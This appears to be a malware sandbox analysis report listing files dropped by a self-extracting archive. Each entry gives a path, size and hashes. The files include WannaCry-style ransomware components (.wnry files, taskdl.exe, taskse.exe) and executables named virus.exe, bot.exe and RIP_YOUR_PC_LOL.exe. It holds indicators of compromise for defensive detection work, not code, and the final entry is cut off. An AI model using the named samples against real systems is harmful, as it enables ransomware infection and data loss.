2f7f0494ae586bd0dc65cb9100d6259858de08970c980fff83a4169e04a192954ea88c38c0ec07d448c711a81ad710265a0ecc50e49d6709c35c1116c76816d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\fud.exe

Filesize
414KB

MD5
6e56b1e5660b59f0c44738f837adabe1

SHA1
41b7d0db71ac1bd1d673574f0cea0419ea4c4c2a

SHA256
b36d61f1da438fef617ecb289756a700e545ec7033e9fdffd929d79a9e2f37d7

SHA512
fac7fb348ad204330e6b4864a29495d2db575d3b39b442ba0c91d18bada1558ba6a3ab7670c5145556c30e65ceaed7ee000bf8f4e86dfddfe68642f89531c286

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\funta.exe

Filesize
875KB

MD5
e03cf843bdb999b5ae92e8c8bda832aa

SHA1
a186ea95d3d552e7f3c2ce0013eaa9899baf652c

SHA256
479c85e8cba2d4eeebf3db349b9004a9ca6a4e20f45a651a15e50b01e461c170

SHA512
f522d591a1c4de75c21a2c034bef6cea3a471c9e5ae41a65b5d0f9c9404202828f36d3f88327924dee27245fa4ac1b28e8ab9387b1d61c23963faff9efc3627e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\goldpromedffdg.exe

Filesize
319KB

MD5
0e0225b03f164fc9cb9689a284a5c785

SHA1
63fc22c1797f3b7e0f71e411344ce4c878f2a530

SHA256
88dc09b808718d7f9f1d32246c5a1db18effa7886f4bf8866ea18dd1cad9835b

SHA512
5ba8d2ad81cee6b83a0e0a60a60ada2c9c6d6b678ea64f3fe866b6e72ea2909ea0e6505e0f365aaa70261449ce41cd7a9b555574df1672e58f9184dfc0c9c6e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\html.exe

Filesize
1.5MB

MD5
77f82a88068d77ba9ece00d21bf3a4db

SHA1
cedf93d2a9dae5a41c7797baaf535f008d0166e9

SHA256
33dd66da63f57e1d64d469172a5d5e7615924bcde919e962c4a5a00c51306051

SHA512
1c3e8eb58ea6139e738bcf1662037669f470d46cdc60c9b4297542bcc545a2673447686a99827a8d07ae06d0260d5b1778159cd41552bc2c571a06ef297a9e1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\hv.exe

Filesize
5.4MB

MD5
6a1db4f73db4ed058c8cd7e04dfa7cc3

SHA1
e3e074af4f3a6ed332eedf518b2d1f9a20314fd6

SHA256
0a5355f8e8a6665e7da928c50309b811b88f011d763d0ab5057a8b969992f5ec

SHA512
1ce79d2b5f58c9d1f6e68cb86a0d24fec883defd55115640b021816facd4bf3748da5a61b1e5da9f76f6b7a2b6c382b72261536bc28f48d0643a9f8aceb98fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\ma.exe

Filesize
5.0MB

MD5
a3fb2b623f4490ae1979fea68cfe36d6

SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4

SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\native.exe

Filesize
5.3MB

MD5
de08b70c1b36bce2c90a34b9e5e61f09

SHA1
1628635f073c61ad744d406a16d46dfac871c9c2

SHA256
432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67

SHA512
18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\poolsdnkjfdbndklsnfgb.exe

Filesize
19.3MB

MD5
e29a0e59ee8a40469e3bedfe2612f567

SHA1
2254d7b5bf1524bb1a224875abba9110f7a815f2

SHA256
118088ebdecef31805885de379e8332d7551078d4f3c6c15db52a70b108cbd76

SHA512
9908d67e32bcbd3f2f29c60ca208bfcaf76252e2f63712d1c625e9a36ac378192977ba6f05cbbfb33baa4db7ae4c1686d36dcfa7363b1dbc571ca3ccbef066df

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\rtx.exe

Filesize
1.9MB

MD5
86f2f5b1e021249025236f1c3a1935d4

SHA1
4d102ec935c274bded67400a90dcd253fd57805f

SHA256
518c488150a5d11ad06aeb133ce63696e2f3918d3c6c997f69ae8ebe9c3870e6

SHA512
0f239c4ed770b0e03d0d0794cb3be21bcea2bc5fda5ac70ca057b92262f9c5362e98c5f672fc865a52f69c219e188a58e864ced8aa79fd127be92b1299259451

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\soft.exe

Filesize
2.2MB

MD5
1836716b2f372522b52f865d74f59dc7

SHA1
f642a469e381c3ec8f3fc9d29b791baf2d654b63

SHA256
8bc73b56e4f82591734a80dfae67191e5fb269ccbe313635be904d9d9f85009f

SHA512
b855a1410b8b633088dab1925061d07b1c89160763c0ce70581397896cd45067c830e694176efb63e14e9bd7cec3685c8c1a66e1f454d5e1b2c6c3c17a117dd3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\stub.exe

Filesize
351KB

MD5
63e601878d77aeba4ba671307f870285

SHA1
655c06920e5f737b0a83018acbab4235b9933733

SHA256
ec2ec99d719ccde3972abb4db0ef83eae6462f4697861529ead23d304c527d29

SHA512
577f0d63afe96cf38110e04d5a27a205973e273243c6875a8cc78b52c36614ad58b549acb73a1e5a31141dd0246f058f7c2cfc78fc5c4c3c053de65b34552ef3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\svcrun.exe

Filesize
4.2MB

MD5
b93c1a30f9aeefb0508a1f16c9a6b34d

SHA1
3065a68ed567c3c5eb6de6579fc489c6fa775d84

SHA256
6c90dd61f4fb62c923098bd71d01fc8bcd8a4bbafd47d168e9ad92d38628b63f

SHA512
955e10707004ba4161949186b006e825e5cf896888ba15fd5eda47b2e63e4165b95881c23b8bcc3fe677e73c060a373fb88e589d7a741790c721cc97a1e26650

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\swizzyyyy.exe

Filesize
260KB

MD5
f077fe2d59ed574c1c63e0d01f440e03

SHA1
24a77588ee53a1b2353fe69654e3e96d220e6fcf

SHA256
c07ab5ae52157b25af3d80b44b8afd41d0d40465f682415d43f5fb8791d03ae5

SHA512
ce2ea5af082f26703118213b0d822fb70555034b1b6567b24e5c48ac9645508fb40478c36d1268ba4d0457d57fd7c6bf4740dda4a696199ea9363a4ce478915c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\syncUpd.exe

Filesize
274KB

MD5
513fd42e16279bd97e0b04394a7e4104

SHA1
0db7aeed6bbd031f1d6ea957101ce78a232028cc

SHA256
c4a1069c405a1a60a98d85875894501818f26e3c852580efb9aca81fb3bd3bbb

SHA512
837f2fa09076a5655ef1cadb029be0298bcec6aa91aa410eae04212076676879403780cb0befcc8bca7117e9c5fb70c559e6e3c6387e28f89f2215d4efa11955

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\timeSync.exe

Filesize
274KB

MD5
a79c94c0fbeac0a4c634798b49458b15

SHA1
9741c9b2eb97c61e07a4e6b5cfb634fd53cd95a0

SHA256
eb4da86f632f1b58e969f341dd0d72c7e441025f214f7dcdf4b1b4a7ab6e828d

SHA512
825aa7e5b1cf3ba02e08554b4bb98dcbaa8c2855fb1bdd60bd7743f1c3ae4085c28b0ddd596b6bfe5199fce6f82c740f73cb5f5a8d8b5b2520a344dc9a294c9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\tpeinf.exe

Filesize
6KB

MD5
cfb7fbf1d4b077a0e74ed6e9aab650a8

SHA1
a91cfbcc9e67e8f4891dde04e7d003fc63b7d977

SHA256
d93add71a451ec7c04c99185ae669e59fb866eb38f463e9425044981ed1bcae0

SHA512
b174d0fed1c605decc4e32079a76fbb324088b710ce1a3fe427a9a30c7bdcd6ac1ad223970cdc64061705f9a268afa96463ee73536b46991981d041517b77785

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\virus.exe

Filesize
74KB

MD5
d7963dc144158429102bda49bc79e89b

SHA1
2d17331b35c800bbc22c2d33e55159a7a49fa5da

SHA256
f5c19d29589d4ac662c87f4aac467d9ca07396d51321d4c589c2dc285a88cd75

SHA512
c187154feb54ea2b2c8daddd370abf32ed53310633d9b4db8c873fbbb1605fa0c21d98afa50a2ef0b497ccfe1b537997d4a4dfecfd16d800b551836bd70f4055

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

Filesize
5.8MB

MD5
637e757d38a8bf22ebbcd6c7a71b8d14

SHA1
0e711a8292de14d5aa0913536a1ae03ddfb933ec

SHA256
477c13d4ca09fdb7fea6487641c6a904d4dee1adecd74ac42e0b00a3842503f9

SHA512
e7a3576370967a4cbd53c33bf65ae26881cca3f713df5bdbcdc9ed76b79e9102c26d5bf940fc2a0e880c7b7ab83c13dcad24608d23981cbcaf551d4e800c67ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

Filesize
3.6MB

MD5
aeaa8d990a7dcadeac018364d4fc4474

SHA1
a03d17b228092b66e2907b1da53ed6095094557d

SHA256
d3589e0af7d7f8761fe11e26c50b6294fc4f6a6ed46dad12ae79246aa51471d8

SHA512
8d0fc4bae8bb49ca4c545982ac0d8843f2721669ae55d0892fd353761debc138ad26386503896aa9f36f1cbe372ea473813dcf1822b03be92b851f247c5f498c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

Filesize
742KB

MD5
a8b8b90c0cf26514a3882155f72d80bd

SHA1
75679e54563b5e5eacf6c926ac4ead1bcc19344f

SHA256
4fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452

SHA512
88708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\c.wnry

Filesize
780B

MD5
93f33b83f1f263e2419006d6026e7bc1

SHA1
1a4b36c56430a56af2e0ecabd754bf00067ce488

SHA256
ef0ed0b717d1b956eb6c42ba1f4fd2283cf7c8416bed0afd1e8805ee0502f2b4

SHA512
45bdd1a9a3118ee4d3469ee65a7a8fdb0f9315ca417821db058028ffb0ed145209f975232a9e64aba1c02b9664c854232221eb041d09231c330ae510f638afac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\m.vbs

Filesize
235B

MD5
eb199eedd01660c289b7279185776a33

SHA1
f522a88b6a89e40b04146a3eb3b4a15f36c7d830

SHA256
93ad6f305f095213661a7ad1d5e3ac9bf36271f066d6ad486bf304bdfedd1c4b

SHA512
b61d54a59b8ecbec99c996df3a392d64a2b87c9711ec2ef59882ccf765f5c1eeb114f2db6e8070514946cbd616567a571927433d59cc9f59906c114a2fbfdc8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_romanian.wnry

Filesize
50KB

MD5
313e0ececd24f4fa1504118a11bc7986

SHA1
e1b9ae804c7fb1d27f39db18dc0647bb04e75e9d

SHA256
70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1

SHA512
c7500363c61baf8b77fce796d750f8f5e6886ff0a10f81c3240ea3ad4e5f101b597490dea8ab6bd9193457d35d8fd579fce1b88a1c8d85ebe96c66d909630730

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_russian.wnry

Filesize
46KB

MD5
452615db2336d60af7e2057481e4cab5

SHA1
442e31f6556b3d7de6eb85fbac3d2957b7f5eac6

SHA256
02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078

SHA512
7613dc329abe7a3f32164c9a6b660f209a84b774ab9c008bf6503c76255b30ea9a743a6dc49a8de8df0bcb9aea5a33f7408ba27848d9562583ff51991910911f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_slovak.wnry

Filesize
40KB

MD5
c911aba4ab1da6c28cf86338ab2ab6cc

SHA1
fee0fd58b8efe76077620d8abc7500dbfef7c5b0

SHA256
e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729

SHA512
3491ed285a091a123a1a6d61aafbb8d5621ccc9e045a237a2f9c2cf6049e7420eb96ef30fdcea856b50454436e2ec468770f8d585752d73fafd676c4ef5e800a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_spanish.wnry

Filesize
36KB

MD5
8d61648d34cba8ae9d1e2a219019add1

SHA1
2091e42fc17a0cc2f235650f7aad87abf8ba22c2

SHA256
72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1

SHA512
68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_swedish.wnry

Filesize
37KB

MD5
c7a19984eb9f37198652eaf2fd1ee25c

SHA1
06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae

SHA256
146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4

SHA512
43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_turkish.wnry

Filesize
41KB

MD5
531ba6b1a5460fc9446946f91cc8c94b

SHA1
cc56978681bd546fd82d87926b5d9905c92a5803

SHA256
6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415

SHA512
ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_vietnamese.wnry

Filesize
91KB

MD5
8419be28a0dcec3f55823620922b00fa

SHA1
2e4791f9cdfca8abf345d606f313d22b36c46b92

SHA256
1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8

SHA512
8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\s.wnry

Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

Filesize
5.0MB

MD5
929335d847f8265c0a8648dd6d593605

SHA1
0ff9acf1293ed8b313628269791d09e6413fca56

SHA256
6613acb18cb8bf501fba619f04f8298e5e633cb220c450212bbc9dd2bef9538d

SHA512
7c9a4d1bec430503cc355dc76955d341e001b06196d4b508cc35d64feb2e8ba30e824e7c3a11c27135d7d99801f45f62a5b558563b4c78f89f5d156a929063fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

Filesize
1.7MB

MD5
544c82bdda10e99b3ed65c3225ea253f

SHA1
228c6693b152b5a3c2accd4d9a441a1aecc29665

SHA256
22dc41c85a0dceae436c90f7ee9b927437563071871157cf238517e1507fa8d2

SHA512
84f3a5231c201f982fd41d56e7aea0d52c2c6e7223ed86fb585601f7bcb6fdcd982e20085b4e9dcd9922662a3bdc8218571900df7f824ce6b4465c2cc0a812d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskdl.exe

Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskse.exe

Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\u.wnry

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat

Filesize
50B

MD5
6a83b03054f53cb002fdca262b76b102

SHA1
1bbafe19ae5bcdd4f3710f13d06332128a5d54f7

SHA256
